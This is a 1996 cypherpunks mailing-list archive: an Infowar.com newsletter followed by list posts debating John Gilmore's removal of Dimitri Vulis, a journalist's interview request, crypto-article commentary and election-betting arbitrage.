Subject: Re: New On WWW.Infowar.Com  Vol I  #4
Message-ID: <1.5.4.32.19961104224500.007539ac@mail.infowar.com>
MIME-Version: 1.0
Content-Type: text/plain


                     New On WWW Infowar.Com   Take a look.  Pass it on.


                                            We thank our sponsors:

                                National Computer Security Association
                                         Open Source Solutions
                       New Dimensions International - Security Training
                                      Secure Computing Corporation
                                      HOMECOM Communications
___________________________________________________________
>      
>      *   New Order Theat Analysis: A Literature Survey
>      *   USAF Opens First Information Warfare Training Laboratory
>      *   The E-Bomb- a Weapon of Electrical Mass Destruction.
>      *   Financial Cryptography 1997 (FC97) The world's first financial
>                 cryptography conference, workshop, and exhibition!
>      *   Where is Winn Schwartau? Check out his schedule!
>      *    New Full Body Scanning Planned for US Airport Security; But is it
>                       safe?
>      *   Lighten your load - some randomly offensive funnies.
>      *   Virtual Reality-Training For the Future, points out that there may 
                        be more than one way to learn marksmanship and other
                        skills that may be needed in a military/crisis
environment.
>       *  A valuable resource... Stateless Warfare: Commandant's Planning
>                   Guidance
>       *  IBIS (International Banking and Information Security) Conference
>                    New York City, February 20-21, 1997.
>       * "Infowarrior Road Kit" - Don't leave home without it!
>       *  A valuable resource... G-TWO Open Source Intelligence
>       *  Quasi-technical humor that should really not offend anyone. 11 Tips.
>       *  From Steve Macko, ENN editor, a briefing and analysis on the
>                      Russian military.
>       *  The Ethics of  Information Warfare and Statecraft
                         by Dr Dan Kuehl, NDU. 
>       *  Interview of Winn Schwartau for a Dutch publication by W. Belgers.
>       *  Infosecurity News....check this out!!! 
>       *  A good read by Ralph McGehee on "CIA's Failure of Intelligence RE:
>                       Terrorism"
>       *  Read about the results of Information Weeks' Information Security
>                       Survey: Internet vulnerability, malicious internal
                         attacks by employees and lack of confidence are key
findings.
>       *  Excellent information on How To Get Less Junk Mail...
>       *  U.S. Arms Control and Disarmament Agency 
>       *  Do you want a copy of your FBI file? Or your file with another
>                  agency? Here's how!
>       *  From Sweden, DESTA Newsletter.
>       *  Big money maker for Year 2000 Problem.
          
>*************************************************************
>
>              We are kicking off the discussion group infowar@infowar.com.
>
>              If you are not registered and want to be to receive this list, go
>                   the website and register.  (http://www.infowar.com)
>
>        To start off the moderated discussion that will be posted  in digest
>   form we are  to begin with opening up the topics to non-lethals,  psyops,
>            chemical warfare agents and  WMD.  Hope you participate!
>
>>*************************************************************
>Archives of C4I have been received and will be available after some hardware
>upgrades.
>  
>*************************************************************
>
>                           Announcing Winn Schwartau's New Book - 
>         
>"Information Warfare - Cyberterrorism:  Protecting Your Personal Security In
>the Electronic Age" by Winn Schwartau
>Thunder's Mouth Press, New York. 212.780.0380 
>ISBN:  1-56025-132-8
>Released Date:  October 30, 1996.

>For futher information contact Thunder's Mouth Press at 212.780.0380, your
>local bookstore or  NCSA at 717.258.1816.
>
****************************************************************
DIRECT REQUESTS to:    list@infowar.com with one-line in the BODY, NOT
in the subject line.

Subscribe news_from_wschwatau  TO JOIN GROUP
Unsubscribe news_from_wschwartau  TO LEAVE GROUP

****************************************************************

http://www.Infowar.Com
Managed by Winn Schwartau
winn@infowar.com
Interpact, Inc.
11511 Pine St.
Seminole, FL  33772
813-393-6600  Voice
813-393-6361   FAX

Comments, Content, Sponsor Opportunties
Betty O'Hearn
Assistant to Mr.Winn Schwartau
betty@infowar.com
813-367-7277   Voice
813-363-7277    FAX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 4 Nov 1996 15:40:29 -0800 (PST)
To: wfrench@interport.net (Will French)
Subject: Re: Censorship on cypherpunks
In-Reply-To: <199611040326.WAA15698@interport.net>
Message-ID: <199611042347.RAA08151@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> > It's only authoritarianism if the government is involved. 
> > Clearly, the government isn't involved in this matter.
>   Until now, I'd considered the list as a model of a libertarian
> society, with the listowner as the government.  My point is that
> if a mailing list (where physical force is generally not a
> factor) can't be run without arbitrary sanctions against
> members, how could anyone ever hope for a whole society, with a
> real, gun-toting government, to run that way?

     At first I had a big problem with Vulva being kicked off the list, 
but I thought about it a while, and as more information developed I came
to the following conclusion:

     Vulis wasn't banned from the list because of _off topic_ posts, nor
was he booted for descenting opnions. He was not removed without warning,
nor for an occasional flame. He was removed for persistent off-topic 
flaming, after at least one warning, and several people asking him to stop.

     The closest anology I can find in real life would be a bar, were people
any person (well, any person old enough, but we'll ignore that) is allowed 
to wander in, order a drink, watch TV, shout at the screen ocassionally 
eat the pretzels and etc. Off in the corner you have a drunk dancing off
time to the noise on the jukebox, but most of the patrons can ignore him.

    Vulis is sitting square in the middle of the bar, sloshed to the gills
throwing pretzels and peanuts at both fans of the opposing team, and 
fans of his team. Screaming at the top of his lungs about the quarterback 
for a totally different team fumbling the ball in the 1970 world series.

    The bar tender asks Vulis politely to cease and desist. Vulis pours 
his beer on him. Vulis then demands another drink, insisting it is his
right to a beer. At this point the Big Bearded Guy at the door with the 
USMC tattoo, and the 37 knife scars drops his ham sized mit on Vulis's  
shoulder. 

     "Buddy" he says "If you don't quiet down and watch the game I'm going
to have to ask you to leave".   

     "Fuck you, you ignorant sovek <spit> pansy" was Vulis' reply. 

     The next sound was Vulis' head opening the door so the rest of his body 
could follow it onto the street, where he stands screaming curses at the 
patrons and the doorman.

     Of course now it is quieter inside, and the noise level will drop even
more once Vulis quiets down, sobers up, or just goes home, and after the 
other drunks quit pondering the situation aloud, and go back to discussing 
the game. Then the only obstruction will be the drunk in the corner who 
keeps stumbling into the jukebox, causing the record to scratch.

     Then there is the patron who left the bar a couple weeks ago in disgust
because he didn't want to talk _about_ football, he just wanted to 
discuss how to make the pitchers better able to slam dunk, and he is planning
to open his own bar down the street...


 
Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 4 Nov 1996 15:18:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cypherpunk Inquest?
Message-ID: <1.5.4.32.19961104231716.006ac1a0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Return-Path: lzkoch@mcs.net
X-Sender: lzkoch@popmail.mcs.net
Date: Mon, 04 Nov 1996 12:28:29 -0600
To: jya@pipeline.com
From: Lewis Koch <lzkoch@mcs.net>
Subject: Regarding a story for Upside Magazine

John Young:

This is an identical letter to a limited number of contributors to
Cypherpunks regarding an article I will be writing for Upside Magazine about
the Cypherpunks List -- its history and the current controversies it now
seems to be facing.

(I'm the person who uncovered the Gorelick/"Manhattan project" story. A more
recent "Cybersense" column dealt with Chicago Police Superintendent Matt
Rodriguez wanting to escape from a 1974 Federal Court injunction against
police department spying on "radicals" so that he could now join in on
investigating Cyberterrorists. See http://www.upside.com/ )  I will  be
writing a number of articles for the magazine itself.  I have been "lurking"
on Cypherpunks for about nine months with only one communications to the
list regarding a request for leads on "Snake Oil" stories.)

I would like to better understand and be able to explain to Upside readers
why several members have chose to "leave" the List.

Perry Metzger and others have argued that flaming and extraneous personal
attacks have negatively impacted serious discussions of encryption, hacking
and public policy and thus they have chosen to end their relationship and
their writings on Cypherpunks, with Metzger forming his own, moderated list.
Others contributors to Cypherpunks have argued that there have been
"distractions" rants about religion, assassination politics, and language
which are inappropriate for the List membership.

Late last week John Gilmore wrote and said he had taken steps to remove Dr.
Vulis from the list which has prompted differing responses.  Some have
responded positively to Gilmore's actions while others have said that it was
an affront to freedom of speech and individual decision-making.

(I have very deliberately chosen _not_ to make this an open letter to the
list, nor will I engage in any open List-dialogue about the people I am
interviewing or what I expect to write.  Naturally I will respond to
individuals once the article is published.)  

I do not expect to be able to publish your responses in their entirety.
They will be edited with honesty and clarity.   I have no agenda here.

I will consider all your written and/or phone communications to be "on the
record" unless you specifically wish prior selected and/or identified parts
of your communications to be "off the record" or "for background purposes
only."  I will _not_ publicly announce a full list of those I have
contacted.  While you are of course free to share this letter with others, I
have already made fairly firm decisions as to who I will contact.  I would
ask that your circulation be highly limited, if circulate you must.  On the
other hand, I will seriously consider suggestions you might offer me
regarding other people who you believe I should contacted regarding this
article. The article will be lengthy but I do not entertain the idea -- at
this point -- about expanding the article into a book length manuscript.
That doesn't mean that if thousands upon thousands gather outside by home
demanding more information, that sometime in the future...

I would prefer to communicate in the open, mainly because I am just now
somewhat tenuously managing PGP through Private Idaho. Those of you who
insist your communications be encrypted, well, it's probably good for my
soul that I honor your request.

Here are the questions I would like you to consider.  Please do not consider
them "definitive" or limiting.  If you believe I have missed out on pursing
certain avenues of thought and argument, please do not hesitate to point
them out to me.  I will note that I will be looking at the history of the
list and I have noted the letter from Hal Finney regarding
http://chaos.taylored.com:1000

I do not expect to write a general follow-up question to this entire list
but I may wish to seek further clarification from individuals from their
answers to this letter.

Thank you, in advance, for what I know will be thoughtful and considered
responses.
 
	*	*	*	*	*	*

1.  What was the original purpose of the Cypherpunks list and has it
changed?  For the better?  Worse?

2.  Does the apparent breakup reveal anything in general about unregulated,
unmoderated lists?  Can one make a link to the breakup to an inherent
failure in the concept of anarchism? Can one make a link from this breakup
to any insight in the nature of the Net itself -- both now and in the
future.     

3.  What do you think led to the  growing number of highly personal, highly
inflammatory attacks made on various contributors to the list -- Tim May
most especially. 

4.  Do you consider discussions about religion, assassination politics, and
other non- cryptographic/encryption subjects to be "distractions" or
substantive additions to intellectual inquiry?  Are some threads more
valuable than others?

5.  Has the list imploded or veered off in a new, positive direction?  



I would ask that you use the header "Cypherstory" in your response and
Cypherstory 1, 2 etc. for further communications, additions, changes.
**********************************************************
Thank you


Lewis Z Koch
lzkoch@mcs.net
http:www.upside.com/
"Cybersense" column






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 4 Nov 1996 19:00:22 -0800 (PST)
To: paul@fatmans.demon.co.uk
Subject: Re: Dr. Vulis is not on cypherpunks any more
In-Reply-To: <847122169.8850.0@fatmans.demon.co.uk>
Message-ID: <Pine.SUN.3.91.961104181608.24626A-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 3 Nov 1996 paul@fatmans.demon.co.uk wrote:

> John, if you, and those who support your actions, claim to be 
> libertarians you need to take a good hard look at what you have
> done.

The core basis of libertarianism, the non-aggression principle,
is usually expressed something like this:

"No one has the right to initiate force for fraud against another."

Perhaps Paul would be so kind as to tell us how he believes John 
has violated this standard.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Mon, 4 Nov 1996 10:29:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Unix Review - letter to editor
Message-ID: <9611041829.AA26083@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



[ I refer to the article starting on p55
  of the Nov 1996 Unix Review. ]


-----letter to Ed start here------

Andrew,

Congratulations on a welcome crypto article in UR.

This is an important topic for security, networks,
web-based commerce etc and is only going to increase in 
importance as people realise data is money.

The article did raise my eyebrows a few times though
with some wild statements - about the speed of brute-force
attacks on DES, and about USG 'key escrow' proposals,
patents and key certification.

Also there are absolutely crucial issues not touched on,
probably for lack of space.  Details matter, and if you're
contemplating another article on the subject I'd be happy
to write it [subject to my boss' approval] or review it
before publication.  The field moves fast at times, and
it would be good to keep an eye on the subject in a fairly
regular column.

Strangely, your author didn't mention ftp.ox.ac.uk,
an ftp site for many good crypto tools, which
(as a UK site) is not subject to US export restrictions.




 -- Peter Allan    peter.allan@aeat.co.uk






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Mon, 4 Nov 1996 09:31:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Political Derivative Securities
In-Reply-To: <199611040446.WAA16999@manifold.algebra.com>
Message-ID: <Pine.HPP.3.91.961104170747.1922A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Nov 1996 ichudov@algebra.com wrote:

> What I do is the following: I go to the Ladbroke's and offer to pay the
> gamblers not $6, but $6.01 if Dole wins. Being somewhat rational, these
> gamblers see a better deal than Ladbroke's offers, and give me their $1
> bills. This is very simple.

In theory very simple indeed. But then there's the matter of trust
(they know Ladbroke will probably be there after the election, but
will you?) and market infringement (will Ladbroke's security allow
you to hang around?) and such practical things. But I understand
that you are more interested in the theoretic basis for arbitrage.
I was talking more about the real world.

> I take their $1 bills and go to "William Hill". I buy, however, LESS
> bets than dollar bills that I received. In particular, I buy 
> $6.01 / $10.00 bets for each dollar that I receive.

Gambling institutions do these kind of insurance transactions all
the time, of course. But many of them don't work only with small
safe margins (changing the odds according to incoming bets pro/con
so that exactly some percentage will always stay in their pockets
after taxes) because they are themselves gamblers.

> Of course, if gamblers could compare prices and choose gambling houses
> easily, no one would ever buy these bets from Ladbroke (unless they are
> crazy).

Some will anyway, out of convenience, if a Ladbroke office happens to
be just around the corner. But those daring to give the highest odds,
and in this case without insuring themselves with counter-odds,
with take most of the customers and most of the profits if Clinton
wins (and the losses if Dole wins).

> This situation means that there is some market imperfection that 
> does not allow arbitrage. It is not clear, though, what this
> imperfection is.

In part for practical reasons, as stated above. That will change
when this kind of betting moves online, with digital cash (if
allowed) or digital traceable money (betters will accept some
degree of taxation). Then all the opportunities hitherto reserved for
gamblers on the stock, commodity and monetary markets will become
available to the more profane betters on sports, horce racing and
elections: derivates, futures etc.

And more. Some of the more esoteric cryptographic protocols will become
of practical value in the gambling business. Like you could bet $n
that Dole will win, prospective takers of the bet could make secret
offers and the highest bidder would get your bet at the next to
highest offered odds, without anybody's offer being revealed. You
might have committed to take that offer, or you might not - different
gambling styles. An all against all situation, serviced by a trusted
entity with committed bits in escrow, living off a very small margin
on all transactions.

Asgaard







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Mon, 4 Nov 1996 18:45:56 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: Censorship on cypherpunks
In-Reply-To: <199611041836.MAA01340@manifold.algebra.com>
Message-ID: <Pine.SUN.3.91.961104183349.23959C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Brigham Young University's censorhappy speech codes. Or me inviting
someone into my home and kicking them out if I feel like it.

-Declan


On Mon, 4 Nov 1996 ichudov@algebra.com wrote:

> Declan McCullagh wrote:
> > 
> > Libertarianism is not incompatible with strict regulations, as long as 
> > the rules violate nobody's rights.
> > 
> 
> I would appreciate an example of "strict regulations" which do not violate
> anybody's rights.
> 
> 	- Igor.
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Mon, 4 Nov 1996 19:04:38 -0800 (PST)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Censorship on cypherpunks
In-Reply-To: <3.0b19.32.19961104164654.007192c4@panix.com>
Message-ID: <Pine.SUN.3.91.961104183920.23959D-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Excellent point and well taken. "Regulations" is misleading; "rules" is a 
better term.

Think the Catholic Church and its historical penchant for excommunication.

-Declan


On Mon, 4 Nov 1996, Duncan Frissell wrote:

> At 04:45 AM 11/4/96 -0800, Declan McCullagh wrote:
> >Libertarianism is not incompatible with strict regulations, as long as 
> >the rules violate nobody's rights.
> >
> >-Declan
> 
> Obviously many voluntary religious organizations have quite strict rules
> for their members and are compatible with libertarianism.  Government
> monopoly regulations that cannot be opted out of are not compatible with
> libertarianism.  Instead of using the loaded term "regulations' it might be
> better to call things like the rules of the cypherpunk's list "club rules"
> or protocols.
> 
> DCF
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 4 Nov 1996 18:56:13 -0800 (PST)
To: "Troy M. Barnhart" <cypherpunks@toad.com
Subject: Re: Any Info for Sen. Pressler....
Message-ID: <199611050256.SAA07039@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:57 PM 11/4/96 -0700, Troy M. Barnhart wrote:

>Due to circumstances I occasionally see and speak 
>w/ Senator Larry Pressler - (Committee Leader)...
>Been talking to him w/ the Burns Bill and such... 
>He wants less gov't. control, but does have "concerns" 
>w/ the garbage...

What does the Burns Bill have to do with "the garbage"?  We're not talking 
about the CDA...


>And, wants to balance the business and private concerns...

Tell him that we get real nervous when someone uses the phrase, "wants to 
balance."  It contains the implicit assumption that the market ("The 
Market") is somehow incapable of providing that "balance."  It also seems to 
assume that the person using the term has the AUTHORITY to "balance" those 
issues.  While senators probably assume that they always have the authority 
to do whatever they want, there is no reason to believe that this should be 
true given the ostensible restrictions of government power in the US 
Constitution.  Since the Internet is really just a large conglomeration of 
private property acting together in cooperation, the government's role should 
be at best quite limited, if not non-existant.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Mon, 4 Nov 1996 11:38:46 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: just what we #$%^&* needed from big brother....
In-Reply-To: <Pine.SOL.3.91.961103154126.12206A-100000@elanor.oit.unc.edu>
Message-ID: <199611041919.MAA07953@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to 1984+  what else with useless and illegally constituted
bureaucrats add to their total infringement of every facet of our life. 

-.NEW SYSTEM LINKS LENDERS, IRS

-.The Internal Revenue Service is developing an electronic program to link
-.mortgage lenders with the IRS, allowing them to exchange e-mail comparing
-.stated earnings on the mortgage application with actual tax return
-.information for the previous couple of years.  If the cross-check turns up a
-.more than $10,000 discrepancy between the earnings claimed on the application
-.and those declared for tax purposes, the IRS has the option of pursuing the
-.loan applicant via an audit.  IRS has targeted the system at self-employed
-.borrowers, who often declare high earnings in order to qualify for a larger
-.loan, but lower earnings when it comes to paying taxes.  "Who knows what
-.their real incomes are?" asks one mortgage broker.  

    (St. Petersburg Times 2 Nov 96 D5 courtesy of Edupage)

--
one of the few things we all share: 
  the utter, corrosive contempt for our elected officials.

  Politicians are like diapers.
    They both need changing regularly, and for the same reason.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Mon, 4 Nov 1996 16:16:31 -0800 (PST)
To: Declan McCullagh <declan@eff.org>
Subject: Re: Telling quote from Bernstein hearing
In-Reply-To: <Pine.SUN.3.91.961103183821.8637A-100000@eff.org>
Message-ID: <Pine.BSF.3.91.961104191405.28750C-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Nov 1996, Declan McCullagh wrote:

> Tony Coppolino was also the Justice Department's lead attorney in the CDA 
> case in Philadelphia. The Feds are grooming lawyers who have a clue about 
> the Net.

Indeed.  At no small expense, DOJ has been training "CTCs" for each 
U.S. Attorney's office.  CTC stands for "Computer and Telecommunications 
Fraud Coordinator."   I know one guy who got sent to four conferences, 
including one with the Famous But Incompetents at Quantico, but who then 
had the bad taste to leave government employ!

EBD


> 
> -Declan
> 
> 
> 
> On Sat, 2 Nov 1996, Lucky Green wrote:
> 
> > In the recent hearing of the Bernstein case, Anthony Coppolino for the 
> > Justice Department said:
> > 
> > 
> > "We don't care about the theory; we don't care about
> > the idea Mr. Bernstein has, which was to take a particular type
> > of algorithm and use it to allow for an encrypted interactive
> > conversation.  That's his idea.
> > We don't care about his idea; we care about the
> > result of what it can do."
> > http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/Legal/
> > 960920.transcript
> > 
> > Encrypted interactive conversations seem to be something to be concerned 
> > about...They are afraid of us.
> > 
> > -- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
> >    Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
> >    Vote Harry Browne for President.
> > 
> > 
> 
> 
> // declan@eff.org // I do not represent the EFF // declan@well.com //
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 4 Nov 1996 19:42:58 -0800 (PST)
To: "dthorn@gte.net>
Subject: Re: Censorship on cypherpunks [RANT]
Message-ID: <19961105034103953.AAA217@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 04 Nov 1996 07:20:15 -0800, Dale Thorn wrote:

>> >  I'm quite upset about this.  Up to now I was able to tell
>> >people that "there is at least one mailing list on the net that
>> >functions in a completely open manner".  No more.

>> This has been taken far too seriously.  Cypherpunks is a *PRIVATE* list.
>> There is no obligation to accept anyone.

>Isn't this the same argument used by the state whenever they want to differentiate
>between your "rights" and your "privileges"?  Can they reject one of your privileges
>whenever they want to, at their discretion?  No.
>So if c-punks is really "private", how does it decide (arbitrarily?) who to include
>and who to reject?

It's a big difference.  Can you set up your own mailing list? Yes.  Can you
go elsewhere? Yes.  Can Mr. Vulis send email directly to list-members anyway?
Yes.

Can you do the same if the government runs it? No.   Can you set up your own
list/printing press* if the state won't publish your ideas? No.

One could apply a similar rationale to socialism - after all, it may seem
like an extension of "love your neighbor" to take care of their needs, which
is certainly a laudable goal.  That's not the problem.  The problem is when
it becomes mandated *with no alternatives*.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 4 Nov 1996 18:13:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks
In-Reply-To: <Pine.SUN.3.91.961104044408.13104A-100000@eff.org>
Message-ID: <mqawwD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


[This was sent directly to me, but apparently cc's to c-punks as well]

Declan McCullagh <declan@eff.org> writes:

> Libertarianism is not incompatible with strict regulations, as long as
> the rules violate nobody's rights.

Let's not confuse strict regulation with arbitrary and capricious plug-pulling.

If the rules say something like, "Whoever incites an ethnic flame war*, or
a religious flame war**, or posts long diatribes that have nothing to do with
cryptoanarchy***, shall be kicked off the mailing list", then they don't seem
to apply to everyone who violates them.

* E.g. by calling multiple posters "crazy Russians"

** E.g. by attacking the poor hapless mormons :-)

*** E.g. by ranting about third-world debt

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 4 Nov 1996 18:13:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOISE] Censorship of Dr. Vulius
In-Reply-To: <2.2.32.19961104092840.006fda90@portal.connect.ab.ca>
Message-ID: <6eBwwD8w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Joe Robinson <joe@connect.ab.ca> writes:
>         I'm sure that the decision wasn't made hastily or lightly.  It
> doesn't change anything though - the damage is done.  If even one person
> doubts the credibility or integrity of either John or the list, then Dr.
> Vulius has won.

I won, but you misspelled my name. Yes, John Gilmore has complete destroyed
his credibility together with whatever goodwill I personally had toward him
- a pity.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 4 Nov 1996 18:15:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks
In-Reply-To: <199611041836.MAA01340@manifold.algebra.com>
Message-ID: <4JBwwD9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:

> Declan McCullagh wrote:
> >
> > Libertarianism is not incompatible with strict regulations, as long as
> > the rules violate nobody's rights.
>
> I would appreciate an example of "strict regulations" which do not violate
> anybody's rights.

Now that's a good point. The First Amendment says "The Congress shall pass
no law..." Doesn't that restrict the Congress's rights as a whole, and each
member's right to vote for bills that violate the Amendment? In GB, they
_generally frown on any restrictions on what laws the Parliament can pass -
the adage is "the Parliament's hands shall not be tied".

Does saying "The list owner should not kick people off the list for speech"
violate the list owner's right to free speech? That depends on whether plug-
pulling (and mailbombing and ping-storming and other obnoxious behavior)
is speech.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 5 Nov 1996 00:32:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Protecting Your Data With Crypto
Message-ID: <1.5.4.32.19961105012435.006acd50@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


We have put the November UNIX Review article Peter cited
in his letter to the editor, "Protecting Your Data With Cryptography," 
at:

     http://jya.com/protect.htm


----------

Peter Allan wrote:
>
>[ I refer to the article starting on p55
>  of the Nov 1996 Unix Review. ]
>
>-----letter to Ed start here------
>
>Andrew,
>
>Congratulations on a welcome crypto article in UR.
>
>This is an important topic for security, networks,
>web-based commerce etc and is only going to increase in 
>importance as people realise data is money.
>
>The article did raise my eyebrows a few times though
>with some wild statements - about the speed of brute-force
>attacks on DES, and about USG 'key escrow' proposals,
>patents and key certification.
>
>Also there are absolutely crucial issues not touched on,
>probably for lack of space.  Details matter, and if you're
>contemplating another article on the subject I'd be happy
>to write it [subject to my boss' approval] or review it
>before publication.  The field moves fast at times, and
>it would be good to keep an eye on the subject in a fairly
>regular column.
>
>Strangely, your author didn't mention ftp.ox.ac.uk,
>an ftp site for many good crypto tools, which
>(as a UK site) is not subject to US export restrictions.
>
>
> -- Peter Allan    peter.allan@aeat.co.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Mon, 4 Nov 1996 21:16:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dr. Vulis
In-Reply-To: <4cDVwD5w165w@bwalk.dm.com>
Message-ID: <Pine.OSF.3.91.961104212605.8774A-100000@gaston.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



What is the story on this or is it more ravings?

Dan


On Mon, 4 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> frantz@netcom.com (Bill Frantz) writes:
> > [John Gilmore]  has said to Dr.
> > Vulis, "You are no longer a member of the cypherpunks community."
> 
> I recall we've been through this over a year ago, when I saw an announcement
> of a cypherpunks physical meeting where someone was excluded for his political
> views, and I said that I don't consider myself a cypherpunk. I'm glad that
> John and Bill, the auhorities on cypherpunk membership, finally concur.
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 4 Nov 1996 19:18:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: [NOISE] If the shoe fits, wear it
In-Reply-To: <199611040630.WAA02244@netcom6.netcom.com>
Message-ID: <gVgwwD12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


frantz@netcom.com (Bill Frantz) writes:
> IMHO, most of the posts about John Gilmore's action re: Dr. Vulis are
> seriously miss-analyzing what has happened.  As far as I can tell, John
> instructed his Majordomo to refuse subscription requests to cypherpunks
> from Dr. Vulis.  That is all that John has done.

That's essentially correct. Apparently he a) unsubscribed me from the
list, b) instructed his Majordomo@toad.com not to respond to _any requests
from me, including "who" or "help". It might have been more polite to
instruct the Majordomo to say something like "I'm ignoring your requests
per the owner's instructions" rather than just play dead.

I recall that a couple of weeks ago Timmy May (fart) reported that someone
had forged an unsubscription request from me in _his name, which didn't work.

It took me very little time to realize what happened. I might or might
not have used that time more productively. I view John's rude actions
as those of a small-time petty bitch - a minor nuisance. It might have
been a bigger nuisance for someone less clueful.

> (1) John has not censored Dr. Vulis.  He is still free to speak to
> cypherpunks by posting in the normal manner.

I've pointed out already that apparently John is not, so far, filtering out my
submissions to the c-punks list. However I'd like to take exception with the
two claims made in the articles cc'd to me so far:

A that only governments can censor;

B that post-factum punishment for "inappropriate" speech is not censorship.

As to A, I'll quote the fat "Webster's 20 Century dictionary":

Censor, n. {l. censor, from censere, to tax, value, judge.]

1. One of the magistrates in Ancient Rome whose business was to draw up a
register of the citizens and the amount of their property, for the purposes of
taxation, and to keep watch over the morals of the citizens, for which purpose
they had power to censure vice and immorality by inflicting a public mark of
ignominy on the offender.

2. any supervisor of public morals; a person who tells people how to behave.

3. a person whose task is to examine literature, motion pictures, etc., and to
remove or prohibit anything considered unsuitable.

4. an official or military officer who reads publications, mail, etc. to remove
any information that might be useful to the enemy.

5. one who censures, blasmes, or reproved; one who is given to censure; any
faultfinder or adverse critic.

